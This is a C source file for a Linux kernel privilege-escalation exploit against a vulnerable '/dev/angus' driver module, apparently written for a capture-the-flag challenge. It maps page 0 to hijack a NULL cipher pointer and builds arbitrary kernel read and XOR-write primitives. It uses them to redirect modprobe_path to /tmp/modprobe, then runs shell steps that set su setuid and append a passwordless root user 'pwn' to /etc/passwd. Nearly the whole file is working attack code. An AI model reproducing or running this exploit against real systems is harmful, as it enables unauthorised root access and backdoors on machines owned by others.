#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#define module "/dev/angus"
#define CMD_INIT 0x13370001
#define CMD_SETKEY 0x13370002
#define CMD_SETDATA 0x13370003
#define CMD_GETDATA 0x13370004
#define CMD_ENCRYPT 0x13370005
#define CMD_DECRYPT 0x13370006
#define KBASE 0xffffffff81000000
int fd; /* handle on the vulnerable device (`module`); opened in main(), used by every angus_* wrapper below */
/*
 * User-side mirror of the module's cipher object. Field order and sizes must
 * match the kernel-side layout exactly: AAR()/AAW() store into this struct at
 * address 0 (see `nullptr` and the MAP_FIXED mmap in main()) and the module
 * reads the fields back through its own pointer.
 */
typedef struct {
char *key;        /* key bytes; AAW() points this at its XOR mask */
char *data;       /* data buffer; AAR() points this at the kernel address to read */
size_t keylen;
size_t datalen;
} XorCipher;
/* The fake cipher object lives at address 0: the exploit relies on the module
 * dereferencing a NULL cipher pointer, so once main() maps page 0 every field
 * of this struct is under user control. Note the name collides with the C23
 * keyword `nullptr`; build as C11/C17. */
XorCipher *nullptr = NULL;
/* ioctl argument shared by every command: a user buffer and its length.
 * Layout must match the kernel side of the interface. */
typedef struct {
char *ptr;
size_t len;
} request_t;
/*
 * Send CMD_INIT to the device. The request payload is not used for this
 * command (presumably ignored by the module), so a zeroed request is passed.
 * Returns the raw ioctl() result: 0 on success, -1 with errno on failure.
 */
int angus_init(void) {
    request_t zero_req = { .ptr = NULL, .len = 0 };
    int rc = ioctl(fd, CMD_INIT, &zero_req);
    return rc;
}
/*
 * CMD_SETKEY: hand the module a new key taken from the user buffer `key`
 * (`keylen` bytes). Returns the raw ioctl() result (0 / -1 + errno).
 */
int angus_setkey(char *key, size_t keylen) {
    request_t r;
    r.ptr = key;
    r.len = keylen;
    return ioctl(fd, CMD_SETKEY, &r);
}
/*
 * CMD_SETDATA: hand the module a new data buffer taken from the user buffer
 * `data` (`datalen` bytes). Returns the raw ioctl() result (0 / -1 + errno).
 */
int angus_setdata(char *data, size_t datalen) {
    return ioctl(fd, CMD_SETDATA, &(request_t){ .ptr = data, .len = datalen });
}
/*
 * CMD_GETDATA: have the module copy `datalen` bytes of the cipher's current
 * data buffer out to the user buffer `data`. AAR() turns this into an
 * arbitrary kernel read by first aiming the cipher's data pointer at a kernel
 * address. Returns the raw ioctl() result (0 / -1 + errno).
 */
int angus_getdata(char *data, size_t datalen) {
    request_t out;
    out.ptr = data;
    out.len = datalen;
    int rc = ioctl(fd, CMD_GETDATA, &out);
    return rc;
}
/*
 * CMD_ENCRYPT: XOR the cipher's data buffer with its key in place (this is
 * what AAW() builds its arbitrary write on). The request payload is unused,
 * so a zeroed request is passed. Returns the raw ioctl() result.
 */
int angus_encrypt() {
    request_t unused = {0};
    return ioctl(fd, CMD_ENCRYPT, &unused);
}
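/*
 * CMD_DECRYPT: presumably XORs the cipher's data buffer with its key in place,
 * the inverse of CMD_ENCRYPT. The request payload is unused.
 *
 * Fix: the original wrapper sent CMD_ENCRYPT here (copy-paste slip) and the
 * CMD_DECRYPT constant was never used. For an XOR cipher both commands are
 * expected to have the same effect, which is why nothing in this exploit
 * noticed, but the wrapper now sends the command its name promises.
 * Returns the raw ioctl() result (0 / -1 + errno).
 */
int angus_decrypt(void) {
    request_t req = { .ptr = NULL, .len = 0 };
    return ioctl(fd, CMD_DECRYPT, &req);
}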
/*
 * Arbitrary kernel read.
 * Copies `len` bytes from kernel address `src` into the user buffer `dst`.
 * The fake XorCipher at page 0 (`nullptr`) has its data pointer aimed at
 * `src`, and CMD_GETDATA copies that "data" back out to `dst`.
 * Requires page 0 to be mapped (main() does this with MAP_FIXED); without it
 * the stores below are a real NULL dereference.
 */
void AAR(char *dst, char *src, size_t len) {
    XorCipher *fake = nullptr;
    fake->data = src;
    fake->datalen = len;
    (void)angus_getdata(dst, len);
}
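/*
 * XOR-style arbitrary kernel write.
 * Every byte at kernel address `dst` becomes old ^ src[i] for `len` bytes, so
 * callers pass the XOR delta between current and desired contents, not the
 * desired bytes (main() does exactly that for modprobe_path).
 *
 * Mechanism: the fake XorCipher at page 0 gets `mask` as its key and `dst` as
 * its data, then CMD_ENCRYPT XORs data with key in place.
 *
 * About the read-back `AAR(dst, mask, len)`: its arguments are the reverse of
 * AAR's (user_dst, kernel_src) contract, so it cannot land the current kernel
 * bytes in `mask`; whether the module rejects that copy or not cannot be told
 * from here. The original ("plz be 0") relied on malloc() happening to hand
 * back zeroed memory, which is what makes the write a pure XOR with `src`.
 * The call is kept so the ioctl sequence is unchanged, and `mask` is now
 * calloc()ed so the all-zero assumption holds by construction.
 *
 * Other fixes vs. the original: the debug dump iterated sizeof(tmp) (8, the
 * pointer size) instead of `len`, reading past the allocation whenever
 * len < 8 (main's 5-byte write did); bytes are printed as unsigned so they
 * are not sign-extended; the allocation is checked.
 */
void AAW(char *dst, char *src, size_t len) {
    char *mask = calloc(len, sizeof *mask);
    if (mask == NULL) {
        perror("calloc");
        return;
    }
    /* See the note above: ineffective as a read-back, kept for fidelity. */
    AAR(dst, mask, len);
    for (size_t i = 0; i < len; i++) {
        printf("%02x ", (unsigned char)mask[i]); /* expected to be all zero */
    }
    putchar('\n');
    for (size_t i = 0; i < len; i++) {
        mask[i] ^= src[i];
    }
    nullptr->key = mask;
    nullptr->data = dst;
    nullptr->keylen = len;
    nullptr->datalen = len;
    angus_encrypt();
    free(mask);
}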
/*
 * Turn the redirected modprobe_path into a root shell (the classic
 * modprobe_path technique: executing a file whose format no binfmt handler
 * recognises makes the kernel run modprobe_path as root).
 * /tmp/asd is given a bogus 4-byte header and executed; /tmp/modprobe is the
 * helper the kernel then runs, which makes su setuid and appends a
 * passwordless uid-0 user "pwn". Finally `su pwn` hands back a root shell.
 * The command strings are byte-identical to the original and run in the same
 * order.
 * Caveat: `echo -ne` is not portable across /bin/sh implementations (dash's
 * echo takes no -e); the trigger still works as long as /tmp/asd does not
 * start with a known binfmt magic, but inspect that file if modprobe is
 * never invoked. Return values of system() are ignored, as in the original.
 */
static void get_root(void) {
    static const char *const steps[] = {
        "echo -ne '\\xff\\xff\\xff\\xff' > /tmp/asd",
        "chmod +x /tmp/asd",
        "echo '#!/bin/sh' > /tmp/modprobe",
        "echo 'chmod +s /bin/su' >> /tmp/modprobe",
        "echo 'echo \"pwn::0:0:pwn:/root:/bin/sh\" >> /etc/passwd' >> /tmp/modprobe",
        "chmod +x /tmp/modprobe",
        "/tmp/asd",
        "su pwn",
    };
    for (size_t i = 0; i < sizeof steps / sizeof steps[0]; i++) {
        system(steps[i]);
    }
}
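/*
 * Entry point: open the vulnerable device, back page 0 with writable memory so
 * the module's NULL cipher pointer becomes a user-controlled object, then use
 * the resulting read/write primitives to redirect modprobe_path and escalate.
 *
 * Fixes vs. the original: open() and mmap() are checked (an unmapped page 0,
 * e.g. because vm.mmap_min_addr forbids MAP_FIXED at 0, would otherwise turn
 * the first AAR() into a plain segfault); the unused `needle` and `buf`
 * locals (a 16 MiB malloc that was never used) are gone; lengths are taken
 * from sizeof the objects involved instead of bare literals.
 * Returns 0 after handing off to get_root(), 1 on setup failure.
 */
int main(void) {
    fd = open(module, O_RDWR);
    if (fd < 0) {
        perror("open " module);
        return 1;
    }
    /* Back page 0: the fake XorCipher (`nullptr`) lives here and AAR()/AAW()
     * write its fields, so this page must be readable and writable. */
    void *zero_page = mmap(0, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE | MAP_POPULATE,
                           -1, 0);
    if (zero_page == MAP_FAILED) {
        perror("mmap(0)");
        return 1;
    }
    /* modprobe_path for this target build. It is hard-coded (KBASE is the
     * matching text base), so this assumes kASLR is off or the address is
     * otherwise known for the running kernel. */
    unsigned long addr = 0xffffffff81e37e60;
    unsigned long content = 0;
    printf("[+] Found MODPROBE: 0x%016lx\n", addr);
    AAR((char *)&content, (char *)addr, sizeof content);
    printf("[+] MODPROBE: 0x%016lx\n", content);
    /* AAW() is an XOR write, so `ovw` is a delta, not the new bytes. Applied at
     * addr+1 to the default "/sbin/modprobe" it turns "sbin/" into "tmp//":
     * 's'^0x07='t', 'b'^0x0f='m', 'i'^0x19='p', 'n'^0x41='/', and the string's
     * terminating NUL (included via sizeof, on purpose) leaves '/' unchanged.
     * "/tmp//modprobe" resolves to the /tmp/modprobe that get_root() creates. */
    char ovw[] = "\x07\x0f\x19\x41";
    AAW((char *)(addr + 1), ovw, sizeof ovw);
    AAR((char *)&content, (char *)addr, sizeof content);
    printf("[+] MODPROBE: 0x%016lx\n", content);
    get_root();
    return 0;
}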